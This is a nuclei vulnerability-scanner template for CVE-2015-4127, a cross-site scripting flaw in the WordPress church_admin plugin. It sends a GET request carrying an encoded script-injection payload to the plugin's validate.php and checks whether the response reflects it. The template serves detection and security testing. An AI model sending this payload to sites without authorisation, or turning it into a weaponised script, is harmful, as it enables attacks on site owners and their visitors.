nuclei-templates/cves/2015/CVE-2015-4127.yaml

36 lines
1.2 KiB
YAML

id: CVE-2015-4127
info:
name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: |
Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
reference:
- https://www.exploit-db.com/exploits/37112
- https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
- https://wordpress.org/plugins/church-admin/changelog/
tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200